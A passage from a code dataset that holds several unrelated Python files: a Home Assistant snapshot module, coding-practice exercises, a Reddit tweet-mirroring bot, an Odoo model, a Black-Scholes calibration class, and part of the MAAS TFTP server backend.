_load_file():\n \"\"\"Read snapshot.json.\"\"\"\n with tarfile.open(self.tarfile, \"r:\") as snapshot:\n json_file = snapshot.extractfile(\"./snapshot.json\")\n return json_file.read()\n\n # read snapshot.json\n try:\n raw = await self.sys_run_in_executor(_load_file)\n except (tarfile.TarError, KeyError) as err:\n _LOGGER.error(\"Can't read snapshot tarfile %s: %s\", self.tarfile, err)\n return False\n\n # parse data\n try:\n raw_dict = json.loads(raw)\n except json.JSONDecodeError as err:\n _LOGGER.error(\"Can't read data for %s: %s\", self.tarfile, err)\n return False\n\n # validate\n try:\n self._data = SCHEMA_SNAPSHOT(raw_dict)\n except vol.Invalid as err:\n _LOGGER.error(\n \"Can't validate data for %s: %s\",\n self.tarfile,\n humanize_error(raw_dict, err),\n )\n return False\n\n return True\n\n async def __aenter__(self):\n \"\"\"Async context to open a snapshot.\"\"\"\n self._tmp = TemporaryDirectory(dir=str(self.sys_config.path_tmp))\n\n # create a snapshot\n if not self.tarfile.is_file():\n return self\n\n # extract an existing snapshot\n def _extract_snapshot():\n \"\"\"Extract a snapshot.\"\"\"\n with tarfile.open(self.tarfile, \"r:\") as tar:\n tar.extractall(path=self._tmp.name, members=secure_path(tar))\n\n await self.sys_run_in_executor(_extract_snapshot)\n\n async def __aexit__(self, exception_type, exception_value, traceback):\n \"\"\"Async context to close a snapshot.\"\"\"\n # exists snapshot or exception on build\n if self.tarfile.is_file() or exception_type is not None:\n self._tmp.cleanup()\n return\n\n # validate data\n try:\n self._data = SCHEMA_SNAPSHOT(self._data)\n except vol.Invalid as err:\n _LOGGER.error(\n \"Invalid data for %s: %s\", self.tarfile, humanize_error(self._data, err)\n )\n raise ValueError(\"Invalid config\") from None\n\n # new snapshot, build it\n def _create_snapshot():\n \"\"\"Create a new snapshot.\"\"\"\n with tarfile.open(self.tarfile, \"w:\") as tar:\n tar.add(self._tmp.name, arcname=\".\")\n\n try:\n write_json_file(Path(self._tmp.name, \"snapshot.json\"), self._data)\n await self.sys_run_in_executor(_create_snapshot)\n except (OSError, json.JSONDecodeError) as err:\n _LOGGER.error(\"Can't write snapshot: %s\", err)\n finally:\n self._tmp.cleanup()\n\n async def store_addons(self, addon_list=None):\n \"\"\"Add a list of add-ons into snapshot.\"\"\"\n addon_list = addon_list or self.sys_addons.installed\n\n async def _addon_save(addon):\n \"\"\"Task to store an add-on into snapshot.\"\"\"\n addon_file = SecureTarFile(\n Path(self._tmp.name, f\"{addon.slug}.tar.gz\"), \"w\", key=self._key\n )\n\n # Take snapshot\n try:\n await addon.snapshot(addon_file)\n except AddonsError:\n _LOGGER.error(\"Can't make snapshot from %s\", addon.slug)\n return\n\n # Store to config\n self._data[ATTR_ADDONS].append(\n {\n ATTR_SLUG: addon.slug,\n ATTR_NAME: addon.name,\n ATTR_VERSION: addon.version,\n ATTR_SIZE: addon_file.size,\n }\n )\n\n # Run tasks\n tasks = [_addon_save(addon) for addon in addon_list]\n if tasks:\n await asyncio.wait(tasks)\n\n async def restore_addons(self, addon_list=None):\n \"\"\"Restore a list add-on from snapshot.\"\"\"\n addon_list = addon_list or self.addon_list\n\n async def _addon_restore(addon_slug):\n \"\"\"Task to restore an add-on into snapshot.\"\"\"\n addon_file = SecureTarFile(\n Path(self._tmp.name, f\"{addon_slug}.tar.gz\"), \"r\", key=self._key\n )\n\n # If exists inside snapshot\n if not addon_file.path.exists():\n _LOGGER.error(\"Can't find snapshot for %s\", addon_slug)\n return\n\n # Perform a restore\n try:\n await self.sys_addons.restore(addon_slug, addon_file)\n except AddonsError:\n _LOGGER.error(\"Can't restore snapshot for %s\", addon_slug)\n\n # Run tasks\n tasks = [_addon_restore(slug) for slug in addon_list]\n if tasks:\n await asyncio.wait(tasks)\n\n async def store_folders(self, folder_list=None):\n \"\"\"Backup Supervisor data into snapshot.\"\"\"\n folder_list = set(folder_list or ALL_FOLDERS)\n\n def _folder_save(name):\n \"\"\"Internal function to snapshot a folder.\"\"\"\n slug_name = name.replace(\"/\", \"_\")\n tar_name = Path(self._tmp.name, f\"{slug_name}.tar.gz\")\n origin_dir = Path(self.sys_config.path_hassio, name)\n\n # Check if exists\n if not origin_dir.is_dir():\n _LOGGER.warning(\"Can't find snapshot folder %s\", name)\n return\n\n # Take snapshot\n try:\n _LOGGER.info(\"Snapshot folder %s\", name)\n with SecureTarFile(tar_name, \"w\", key=self._key) as tar_file:\n tar_file.add(\n origin_dir,\n arcname=\".\",\n filter=exclude_filter(MAP_FOLDER_EXCLUDE.get(name, [])),\n )\n\n _LOGGER.info(\"Snapshot folder %s done\", name)\n self._data[ATTR_FOLDERS].append(name)\n except (tarfile.TarError, OSError) as err:\n _LOGGER.warning(\"Can't snapshot folder %s: %s\", name, err)\n\n # Run tasks\n tasks = [\n self.sys_run_in_executor(_folder_save, folder) for folder in folder_list\n ]\n if tasks:\n await asyncio.wait(tasks)\n\n async def restore_folders(self, folder_list=None):\n \"\"\"Backup Supervisor data into snapshot.\"\"\"\n folder_list = set(folder_list or self.folders)\n\n def _folder_restore(name):\n \"\"\"Intenal function to restore a folder.\"\"\"\n slug_name = name.replace(\"/\", \"_\")\n tar_name = Path(self._tmp.name, f\"{slug_name}.tar.gz\")\n origin_dir = Path(self.sys_config.path_hassio, name)\n\n # Check if exists inside snapshot\n if not tar_name.exists():\n _LOGGER.warning(\"Can't find restore folder %s\", name)\n return\n\n # Clean old stuff\n if origin_dir.is_dir():\n remove_folder(origin_dir)\n\n # Perform a restore\n try:\n _LOGGER.info(\"Restore folder %s\", name)\n with SecureTarFile(tar_name, \"r\", key=self._key) as tar_file:\n tar_file.extractall(path=origin_dir, members=tar_file)\n _LOGGER.info(\"Restore folder %s done\", name)\n except (tarfile.TarError, OSError) as err:\n _LOGGER.warning(\"Can't restore folder %s: %s\", name, err)\n\n # Run tasks\n tasks = [\n self.sys_run_in_executor(_folder_restore, folder) for folder in folder_list\n ]\n if tasks:\n await asyncio.wait(tasks)\n\n def store_homeassistant(self):\n \"\"\"Read all data from Home Assistant object.\"\"\"\n self.homeassistant[ATTR_VERSION] = self.sys_homeassistant.version\n self.homeassistant[ATTR_WATCHDOG] = self.sys_homeassistant.watchdog\n self.homeassistant[ATTR_BOOT] = self.sys_homeassistant.boot\n self.homeassistant[ATTR_WAIT_BOOT] = self.sys_homeassistant.wait_boot\n\n # Custom image\n if self.sys_homeassistant.is_custom_image:\n self.homeassistant[ATTR_IMAGE] = self.sys_homeassistant.image\n self.homeassistant[\n ATTR_LAST_VERSION\n ] = self.sys_homeassistant.latest_version\n\n # API/Proxy\n self.homeassistant[ATTR_PORT] = self.sys_homeassistant.api_port\n self.homeassistant[ATTR_SSL] = self.sys_homeassistant.api_ssl\n self.homeassistant[ATTR_REFRESH_TOKEN] = self._encrypt_data(\n self.sys_homeassistant.refresh_token\n )\n\n # Audio\n self.homeassistant[ATTR_AUDIO_INPUT] = self.sys_homeassistant.audio_input\n self.homeassistant[ATTR_AUDIO_OUTPUT] = self.sys_homeassistant.audio_output\n\n def restore_homeassistant(self):\n \"\"\"Write all data to the Home Assistant object.\"\"\"\n self.sys_homeassistant.watchdog = self.homeassistant[ATTR_WATCHDOG]\n self.sys_homeassistant.boot = self.homeassistant[ATTR_BOOT]\n self.sys_homeassistant.wait_boot = self.homeassistant[ATTR_WAIT_BOOT]\n\n # Custom image\n if self.homeassistant.get(ATTR_IMAGE):\n self.sys_homeassistant.image = self.homeassistant[ATTR_IMAGE]\n self.sys_homeassistant.latest_version = self.homeassistant[\n ATTR_LAST_VERSION\n ]\n\n # API/Proxy\n self.sys_homeassistant.api_port = self.homeassistant[ATTR_PORT]\n self.sys_homeassistant.api_ssl = self.homeassistant[ATTR_SSL]\n self.sys_homeassistant.refresh_token = self._decrypt_data(\n self.homeassistant[ATTR_REFRESH_TOKEN]\n )\n\n # Audio\n self.sys_homeassistant.audio_input = self.homeassistant[ATTR_AUDIO_INPUT]\n self.sys_homeassistant.audio_output = self.homeassistant[ATTR_AUDIO_OUTPUT]\n\n # save\n self.sys_homeassistant.save_data()\n\n def store_repositories(self):\n \"\"\"Store repository list into snapshot.\"\"\"\n self.repositories = self.sys_config.addons_repositories\n\n def restore_repositories(self):\n \"\"\"Restore repositories from snapshot.\n\n Return a coroutine.\n \"\"\"\n return self.sys_store.update_repositories(self.repositories)\n","sub_path":"supervisor/snapshots/snapshot.py","file_name":"snapshot.py","file_ext":"py","file_size_in_byte":16162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"169898152","text":"# def filter_list(l):\n# new_list = []\n# for index in l:\n# if index is int:\n# new_list.append(index)\n# return new_list\n# # 'return a new list with the strings filtered out'\n\n# print(filter_list([1,2,'a','b']),[1,2])\n# print(filter_list([1,'a','b',0,15]),[1,0,15])\n# print(filter_list([1,2,'aasf','1','123',123]),[1,2,123])\n\ndef is_square(n):\n # root = n ** (1/2)\n # print(root)\n # if (n**(1/2)) % 1 == 0:\n # return True\n if n >= 0:\n return (n**0.5) % 1 == 0\n return False # fix me\n\n # return n >= 0 and (n**0.5) % 1 == 0\n\nprint(is_square(4))\nprint(is_square(1327898974))\n","sub_path":"training/codewars_0.py","file_name":"codewars_0.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"93451953","text":"import praw, tweepy\n\nfrom tweepy import OAuthHandler\n\n#Remember to fill out these fields\ntwi_key = ''\ntwi_secr = ''\ntwi_acc_tok = ''\ntwi_acc_sec = ''\n\ntwi = OAuthHandler(twi_key, twi_secr)\ntwi.set_access_token(twi_acc_tok, twi_acc_sec)\n\nt = tweepy.API(twi)\n\n#Fill out these too\nr = praw.Reddit(client_id='',client_secret='',password='your_password',user_agent='',username='redditUser')\n\npcmr = r.subreddit(\"all\")\n\nblacklisted = {'suicidewatch','depression'}\n\ndef allowed(submission):\n\tallComments = submission.comments\n\tisItAllowed = True;\n\tfor comm in allComments:\n\t\t#And fill out this with your bot username\n\t\tif comm.author.name in 'redditUser':\n\t\t\tisItAllowed = False\n\t\n\treturn isItAllowed\n\nfor submission in pcmr.stream.submissions():\n\turl = submission.url\n\tif allowed(submission) == True:\n\t\tif not submission.subreddit.display_name.lower() in blacklisted:\n\t\t\tif not \"twitter.com\" not in url:\n\t\t\t\tif not \"status\" not in url:\n\t\t\t\t\tprint(' ')\n\t\t\t\t\tprint(submission.shortlink)\n\t\t\t\t\tprint(url)\n\t\t\t\t\t\n\t\t\t\t\tid = url.split('/', 5)[5]\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tnew = t.get_status(id)\n\t\t\t\t\tcont = new.text\n\n\t\t\t\t\tsubmission.reply('[Tweet by @' + str(new.user.screen_name) + ':]('+str(url)+')\\n\\n-------------------------\\n\\n' + str(cont)+'\\n\\n-------------------------\\n\\nThis is an experimental bot. Available on [GitHub](https://github.com/gronnmann/Twittzer).')\n","sub_path":"src/twittzer.py","file_name":"twittzer.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"640256835","text":"import math # для вещественных значений понадобится округление вверх и вниз (не математическое)\r\n\r\nuser_number1 = float(input('введите первое число (например: 5, 10, 8.9)\\n>>>'))\r\nuser_number2 = float(input('\\nвведите первое число (например: 5, 10, 8.9)\\n>>>'))\r\n\r\n# определяем меньшее и большее из введенных чисел\r\nmin_user_number = min(user_number1, user_number2)\r\nmax_user_number = max(user_number1, user_number2)\r\n\r\n# преобразовываем вещественные числа для цыкла\r\nnumber_start_range = math.ceil(min_user_number)\r\nnumber_end_range = math.floor(max_user_number) + 1 # +1 чтобы учесть последнее число в промежутке\r\n\r\nsuma_natural = 0\r\n\r\nfor i in range(number_start_range, number_end_range):\r\n suma_natural += i\r\n\r\n# выдаем формат чисел в зависимости от введенного формата пользователем\r\nif min_user_number - math.floor(min_user_number) == 0:\r\n print_user_number1 = int(min_user_number)\r\nelse:\r\n print_user_number1 = min_user_number\r\n\r\nif max_user_number - math.floor(max_user_number) == 0:\r\n print_user_number2 = int(max_user_number)\r\nelse:\r\n print_user_number2 = max_user_number\r\n\r\nprint('Сумма натуральных чисел между числом {} и числом {} = {}'.format(print_user_number1, print_user_number2, suma_natural))","sub_path":"hw_2_2.py","file_name":"hw_2_2.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"330740037","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\nfrom odoo import api, fields, models, tools, SUPERUSER_ID, _\n\nclass KGDepositType(models.Model):\n _name = 'deposit.type'\n\n name = fields.Char(\n 'Name',\n required=True,\n )\n\n allow_pos = fields.Boolean(\n 'Allow POS',\n default=False,\n )\n","sub_path":"local/kg_account/models/deposit_type.py","file_name":"deposit_type.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"466935106","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 28 19:24:54 2018\n\n@author: andy\n\"\"\"\n\nimport pandas as pd\nfrom scipy import interpolate\nimport numpy as np\nimport os\nimport scipy.stats as stats\nfrom scipy.optimize import minimize\n\n# Calculate the Black Scholes price of European call option\ndef bs_price(s, k, p, T, q, sigma):\n\tF = s * np.exp(-q * T)/p\n\td1 = (np.log(F / k) + 0.5 * sigma**2 * T) / (sigma * np.sqrt(T))\n\td2 = d1 - sigma * np.sqrt(T)\n\tprice = p * (F * stats.norm.cdf(d1) - k * stats.norm.cdf(d2))\n\treturn price\n\t\t\t\t\nclass Stock_calibrate_BS:\n\t\"\"\"\n\tBS model calibration, assuming deterministic short rates and constant dividend\n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"\n\t\t1. Compute BS vol using Black Formula. \n\t\t2. self.simga is a function that takes in (S_t,t,r_t), although the arguments do not affect the value returned (just to be consistent with LV sigma function)\n\t\t\"\"\"\n\t\t# Import raw data\n\t\tdf_stock_stats = pd.read_csv(os.path.join(\"data\", \"Stock.csv\"), index_col=0, header=None)\n\t\tspot_str = df_stock_stats.loc['Price'].squeeze()\n\t\tself.spot = float(spot_str)\n\t\tdiv_str = df_stock_stats.loc['div'].squeeze()\n\t\tself.q = float(div_str.strip(\"%\"))/100\n\t\tdf_s = pd.read_csv(os.path.join(\"data\",\"StockCall_shortterm.csv\"),index_col=0)\n\t\tdf_m = pd.read_csv(os.path.join(\"data\",\"StockCall_midterm.csv\"),index_col=0)\n\t\tdf_l = pd.read_csv(os.path.join(\"data\",\"StockCall_longterm.csv\"),index_col=0)\n\t\t\n\t\t# Drop deep ITM options data which have little liquidity\n\t\tself.df_all = pd.concat([df_s, df_m,df_l], axis=1)\n\t\tself.df_all = self.df_all.loc[self.df_all.index >=2500]\n\t\tself.df_all = self.df_all.loc[self.df_all.index<=3500 ]\n\t\t# Euro bond price\n\t\tdf_Yield = pd.read_csv(os.path.join(\"data\",\"GERYield.csv\"),\n\t\t header = None, delimiter = \"\\t\", index_col=0)\n\t\tT = np.array(df_Yield.index)\n\t\tyields = np.array(df_Yield.loc[:,1])\n\t\tself.yields_interp = interpolate.interp1d(T.squeeze(), yields, 'cubic', fill_value='extrapolate')\n\t\t\n\t\tT_indays = self.df_all.columns.astype(float)\n\t\tself.T_inyears = T_indays/365.0\n\t\t\n\t\tself.observed_prices = np.array(self.df_all)\n\t\tres = minimize(lambda x: self.fit_MSE(x),0.2,method='BFGS', tol=1.0)\n\t\tprint(\"BS impvol:\", res.x[0])\n\t\tdef BS_impvol(s,t,r):\n\t\t\treturn res.x[0]\n\t\tself.sigma = BS_impvol\n\t\t\n\tdef get_fitted_call_price(self,sig):\n\t\tfitted_prices = np.zeros(self.observed_prices.shape)\n\t\tfor j,K in enumerate(self.df_all.index):\n\t\t\tfor i in range(len(self.T_inyears)):\n\t\t\t\tT = self.T_inyears[i]\n\t\t\t\tp = self.Euro_bond_price(T)\n\t\t\t\tfitted_prices[j,i] = bs_price(self.spot,K,p,T,self.q,sig)\n\t\t\n\t\treturn fitted_prices\n\t\n\tdef fit_MSE(self,sig):\n\t\tfitted_prices=self.get_fitted_call_price(sig)\n\t\terr = (fitted_prices-self.observed_prices)**2\n\t\treturn np.nanmean(err)\n\t\t\n\tdef Euro_bond_price(self,T):\n\t\tT_yield = self.yields_interp(T)\n\t\tprice = (1+T_yield/100)**(-T)\n\t\treturn price\n\n\n","sub_path":"Stock_BS_calibrate.py","file_name":"Stock_BS_calibrate.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"85039509","text":"#!/bin/python3\n\n# https://www.hackerrank.com/contests/hourrank-26/challenges/pair-sums\n\nimport sys\n\ndef prod_nchoose2(arr):\n if len(A) == 1:\n return arr\n for i in range(len(arr)):\n for j in range(len(arr[i+1:])):\n yield arr[i] * arr[i+1:][j]\n\ndef largestValue(A):\n # Return the largest value of any of A's nonempty subarrays.\n # for prod in prod_nchoose2(A):\n # print(prod)\n # print(sum(prod_nchoose2(A)))\n if len(A) == 1:\n return A[0]\n curr_sumprod = 0\n max_sumprod = 0\n start = 0\n end = 0\n while end < len(A):\n # print(start, end)\n subarray = A[start:end]\n sumprod = sum(prod_nchoose2(subarray))\n curr_sumprod = max(curr_sumprod, sumprod)\n max_sumprod = max(max_sumprod, curr_sumprod)\n if start == end:\n start = 0\n end += 1\n continue\n start += 1\n return max_sumprod\n\nif __name__ == \"__main__\":\n n = int(input().strip())\n A = list(map(int, input().strip().split(' ')))\n result = largestValue(A)\n print(result)\n","sub_path":"hackerrank/all_contests/hourrank/26/x_pair_sums.py","file_name":"x_pair_sums.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"492760228","text":"# Copyright 2012-2016 Canonical Ltd. This software is licensed under the\n# GNU Affero General Public License version 3 (see the file LICENSE).\n\n\"\"\"Twisted Application Plugin for the MAAS TFTP server.\"\"\"\n\n__all__ = [\n \"TFTPBackend\",\n \"TFTPService\",\n ]\n\nfrom functools import partial\nfrom socket import (\n AF_INET,\n AF_INET6,\n)\n\nfrom netaddr import IPAddress\nfrom provisioningserver.boot import (\n BootMethodRegistry,\n get_remote_mac,\n)\nfrom provisioningserver.drivers import ArchitectureRegistry\nfrom provisioningserver.drivers.osystem import OperatingSystemRegistry\nfrom provisioningserver.events import (\n EVENT_TYPES,\n send_node_event_mac_address,\n)\nfrom provisioningserver.kernel_opts import KernelParameters\nfrom provisioningserver.logger import (\n get_maas_logger,\n LegacyLogger,\n)\nfrom provisioningserver.rpc.boot_images import list_boot_images\nfrom provisioningserver.rpc.exceptions import BootConfigNoResponse\nfrom provisioningserver.rpc.region import (\n GetBootConfig,\n MarkNodeFailed,\n)\nfrom provisioningserver.utils import (\n tftp,\n typed,\n)\nfrom provisioningserver.utils.network import get_all_interface_addresses\nfrom provisioningserver.utils.tftp import TFTPPath\nfrom provisioningserver.utils.twisted import (\n deferred,\n RPCFetcher,\n)\nfrom tftp.backend import FilesystemSynchronousBackend\nfrom tftp.errors import (\n BackendError,\n FileNotFound,\n)\nfrom tftp.protocol import TFTP\nfrom twisted.application import internet\nfrom twisted.application.service import MultiService\nfrom twisted.internet import (\n reactor,\n udp,\n)\nfrom twisted.internet.abstract import isIPv6Address\nfrom twisted.internet.address import (\n IPv4Address,\n IPv6Address,\n)\nfrom twisted.internet.defer import (\n inlineCallbacks,\n maybeDeferred,\n returnValue,\n succeed,\n)\nfrom twisted.internet.task import deferLater\nfrom twisted.python.filepath import FilePath\n\n\nmaaslog = get_maas_logger(\"tftp\")\nlog = LegacyLogger()\n\n\ndef get_boot_image(params):\n \"\"\"Get the boot image for the params on this rack controller.\"\"\"\n # Match on purpose; enlist uses the commissioning purpose.\n purpose = params[\"purpose\"]\n if purpose == \"enlist\":\n purpose = \"commissioning\"\n\n # Get the matching boot images, minus subarchitecture.\n boot_images = list_boot_images()\n boot_images = [\n image\n for image in boot_images\n if (image['osystem'] == params['osystem'] and\n image['release'] == params['release'] and\n image['architecture'] == params['arch'] and\n image['purpose'] == purpose)\n ]\n\n # See if exact subarchitecture match.\n for image in boot_images:\n maaslog.error(\"DEBUG: Image subarch - %s Params subarch - %s\" % (image[\"subarchitecture\"], params[\"subarch\"]))\n if image[\"subarchitecture\"] == params[\"subarch\"]:\n return image\n\n # Not exact match check if subarchitecture is in the supported\n # subarchitectures list.\n for image in boot_images:\n subarches = image.get(\"supported_subarches\", \"\")\n maaslog.error(\"DEBUG: Supported subarches - %s\" % subarches)\n subarches = subarches.split(\",\")\n if params[\"subarch\"] in subarches:\n return image\n\n # No matching boot image was found.\n return None\n\n\ndef log_request(mac_address, file_name, clock=reactor):\n \"\"\"Log a TFTP request.\n\n This will be logged to the regular log, and also to the node event log at\n a later iteration of the `clock` so as to not delay the task currently in\n progress.\n \"\"\"\n # If the file name is a byte string, decode it as ASCII, replacing\n # non-ASCII characters, so that we have at least something to log.\n if isinstance(file_name, bytes):\n file_name = file_name.decode(\"ascii\", \"replace\")\n # Log to the regular log.\n log.info(\n \"{file_name} requested by {mac_address}\", file_name=file_name,\n mac_address=mac_address)\n # Log to the node event log.\n d = deferLater(\n clock, 0, send_node_event_mac_address,\n event_type=EVENT_TYPES.NODE_TFTP_REQUEST,\n mac_address=mac_address, description=file_name)\n d.addErrback(log.err, \"Logging TFTP request failed.\")\n\n\nclass TFTPBackend(FilesystemSynchronousBackend):\n \"\"\"A partially dynamic read-only TFTP server.\n\n Static files such as kernels and initrds, as well as any non-MAAS files\n that the system may already be set up to serve, are served up normally.\n But PXE configurations are generated on the fly.\n\n When a PXE configuration file is requested, the server asynchronously\n requests the appropriate parameters from the API (at a configurable\n \"generator URL\") and generates a config file based on those.\n\n The regular expressions `re_config_file` and `re_mac_address` specify\n which files the server generates on the fly. Any other requests are\n passed on to the filesystem.\n\n Passing requests on to the API must be done very selectively, because\n failures cause the boot process to halt. This is why the expression for\n matching the MAC address is so narrowly defined: PXELINUX attempts to\n fetch files at many similar paths which must not be passed on.\n \"\"\"\n\n def __init__(self, base_path, client_service):\n \"\"\"\n :param base_path: The root directory for this TFTP server.\n :param client_service: The RPC client service for the rack controller.\n \"\"\"\n if not isinstance(base_path, FilePath):\n base_path = FilePath(base_path)\n super(TFTPBackend, self).__init__(\n base_path, can_read=True, can_write=False)\n self.client_to_remote = {}\n self.client_service = client_service\n self.fetcher = RPCFetcher()\n\n def _get_new_client_for_remote(self, remote_ip):\n \"\"\"Return a new client for the `remote_ip`.\n\n Don't use directly called from `get_client_for`.\n \"\"\"\n def store_client(client):\n self.client_to_remote[remote_ip] = client\n return client\n\n d = self.client_service.getClientNow()\n d.addCallback(store_client)\n return d\n\n def get_client_for(self, params):\n \"\"\"Always gets the same client based on `params`.\n\n This is done so that all TFTP requests from the same remote client go\n to the same regiond process. `RPCFetcher` only duplciate on the client\n and arguments, so if the client is not the same the duplicate effort\n is not consolidated.\n \"\"\"\n remote_ip = params.get('remote_ip')\n if remote_ip:\n client = self.client_to_remote.get(remote_ip, None)\n if client is None:\n # Get a new client for the remote_ip.\n return self._get_new_client_for_remote(remote_ip)\n else:\n # Check that the existing client is still valid.\n clients = self.client_service.getAllClients()\n if client in clients:\n return succeed(client)\n else:\n del self.client_to_remote[remote_ip]\n return self._get_new_client_for_remote(remote_ip)\n else:\n return self.client_service.getClientNow()\n\n @inlineCallbacks\n @typed\n def get_boot_method(self, file_name: TFTPPath):\n \"\"\"Finds the correct boot method.\"\"\"\n for _, method in BootMethodRegistry:\n params = yield maybeDeferred(method.match_path, self, file_name)\n if params is not None:\n params[\"bios_boot_method\"] = method.bios_boot_method\n returnValue((method, params))\n returnValue((None, None))\n\n def get_boot_image(self, params, client, remote_ip):\n \"\"\"Get the boot image for the params on this rack controller.\n\n Calls `MarkNodeFailed` for the machine if its a known machine.\n \"\"\"\n is_ephemeral = False\n try:\n osystem_obj = OperatingSystemRegistry.get_item(params['osystem'],\n default=None)\n purposes = osystem_obj \\\n .get_boot_image_purposes(params[\"arch\"], params[\"subarch\"],\n params.get(\"release\", \"\"),\n params.get(\"label\", \"\"))\n if \"ephemeral\" in purposes:\n is_ephemeral = True\n except:\n pass\n\n system_id = params.pop(\"system_id\", None)\n if params[\"purpose\"] == \"local\" and not is_ephemeral:\n # Local purpose doesn't use a boot image so jsut set the label\n # to \"local\", but this value will no be used.\n params[\"label\"] = \"local\"\n return params\n else:\n if params[\"purpose\"] == \"local\" and is_ephemeral:\n params[\"purpose\"] = \"ephemeral\"\n boot_image = get_boot_image(params)\n if boot_image is None:\n # No matching boot image.\n description = \"Missing boot image %s/%s/%s/%s.\" % (\n params['osystem'], params[\"arch\"],\n params[\"subarch\"], params[\"release\"])\n # Call MarkNodeFailed if this was a known machine.\n if system_id is not None:\n d = client(\n MarkNodeFailed,\n system_id=system_id,\n error_description=description)\n d.addErrback(\n log.err,\n \"Failed to mark machine failed: %s\" % description)\n else:\n maaslog.error(\n \"Enlistment failed to boot %s; missing required boot \"\n \"image %s/%s/%s/%s.\" % (\n remote_ip,\n params['osystem'], params[\"arch\"],\n params[\"subarch\"], params[\"release\"]))\n params[\"label\"] = \"no-such-image\"\n else:\n params[\"label\"] = boot_image[\"label\"]\n return params\n\n @deferred\n def get_kernel_params(self, params):\n \"\"\"Return kernel parameters obtained from the API.\n\n :param params: Parameters so far obtained, typically from the file\n path requested.\n :return: A `KernelParameters` instance.\n \"\"\"\n # Extract from params only those arguments that GetBootConfig cares\n # about; params is a context-like object and other stuff (too much?)\n # gets in there.\n arguments = (\n name.decode(\"ascii\")\n for name, _ in GetBootConfig.arguments\n )\n params = {\n name: params[name] for name in arguments\n if name in params\n }\n\n def fetch(client, params):\n params[\"system_id\"] = client.localIdent\n d = self.fetcher(client, GetBootConfig, **params)\n d.addCallback(self.get_boot_image, client, params['remote_ip'])\n d.addCallback(lambda data: KernelParameters(**data))\n return d\n\n d = self.get_client_for(params)\n d.addCallback(fetch, params)\n return d\n\n @deferred\n def get_boot_method_reader(self, boot_method, params):\n \"\"\"Return an `IReader` for a boot method.\n\n :param boot_method: Boot method that is generating the config\n :param params: Parameters so far obtained, typically from the file\n path requested.\n \"\"\"\n def generate(kernel_params):\n return boot_method.get_reader(\n self, kernel_params=kernel_params, **params)\n\n return self.get_kernel_params(params).addCallback(generate)\n\n @staticmethod\n def no_response_errback(failure, file_name):\n failure.trap(BootConfigNoResponse)\n # Convert to a TFTP file not found.\n raise FileNotFound(file_name)\n\n @deferred\n @typed\n def handle_boot_method(self, file_name: TFTPPath, result):\n boot_method, params = result\n if boot_method is None:\n return super(TFTPBackend, self).get_reader(file_name)\n\n # Map pxe namespace architecture names to MAAS's.\n arch = params.get(\"arch\")\n if arch is not None:\n maasarch = ArchitectureRegistry.get_by_pxealias(arch)\n if maasarch is not None:\n params[\"arch\"] = maasarch.name.split(\"/\")[0]\n\n # Send the local and remote endpoint addresses.\n local_host, local_port = tftp.get_local_address()\n params[\"local_ip\"] = local_host\n remote_host, remote_port = tftp.get_remote_address()\n params[\"remote_ip\"] = remote_host\n d = self.get_boot_method_reader(boot_method, params)\n return d\n\n @staticmethod\n def all_is_lost_errback(failure):\n if failure.check(BackendError):\n # This failure is something that the TFTP server knows how to deal\n # with, so pass it through.\n return failure\n else:\n # Something broke badly; record it.\n log.err(failure, \"TFTP back-end failed.\")\n # Don't keep people waiting; tell them something broke right now.\n raise BackendError(failure.getErrorMessage())\n\n @deferred\n @typed\n def get_reader(self, file_name: TFTPPath):\n \"\"\"See `IBackend.get_reader()`.\n\n If `file_name` matches a boot method then the response is obtained\n from that boot method. Otherwise the filesystem is used to service\n the response.\n \"\"\"\n # It is possible for a client to request the file with '\\' instead\n # of '/', example being 'bootx64.efi'. Convert all '\\' to '/' to be\n # unix compatiable.\n file_name = file_name.replace(b'\\\\', b'/')\n mac_address = get_remote_mac()\n if mac_address is not None:\n log_request(mac_address, file_name)\n d = self.get_boot_method(file_name)\n d.addCallback(partial(self.handle_boot_method, file_name))\n d.addErrback(self.no_response_errback, file_name)\n d.addErrback(self.all_is_lost_errback)\n return d\n\n\nclass Port(udp.Port):\n \"\"\"A :py:class:`udp.Port` that groks IPv6.\"\"\"\n\n # This must be set by call sites.\n addressFamily = None\n\n def getHost(self):\n \"\"\"See :py:meth:`twisted.internet.udp.Port.getHost`.\"\"\"\n host, port = self.socket.getsockname()[:2]\n addr_type = IPv6Address if isIPv6Address(host) else IPv4Address\n return addr_type('UDP', host, port)\n\n\nclass UDPServer(internet.UDPServer):\n \"\"\"A :py:class:`~internet.UDPServer` that groks IPv6.\n\n This creates the port directly instead of using the reactor's\n ``listenUDP`` method so that we can do a switcharoo to our own\n IPv6-enabled port implementation.\n \"\"\"\n\n def _getPort(self):\n \"\"\"See :py:meth:`twisted.application.internet.UDPServer._getPort`.\"\"\"\n return self._listenUDP(*self.args, **self.kwargs)\n\n def _listenUDP(self, port, protocol, interface='', maxPacketSize=8192):\n \"\"\"See :py:meth:`twisted.internet.reactor.listenUDP`.\"\"\"\n p = Port(port, protocol, interface, maxPacketSize)\n p.addressFamily = AF_INET6 if isIPv6Address(interface) else AF_INET\n p.startListening()\n return p\n\n\nclass TFTPService(MultiService, object):\n \"\"\"An umbrella service representing a set of running TFTP servers.\n\n Creates a UDP server individually for each discovered network\n interface, so that we can detect the interface via which we have\n received a datagram.\n\n It then periodically updates the servers running in case there's a\n change to the host machine's network 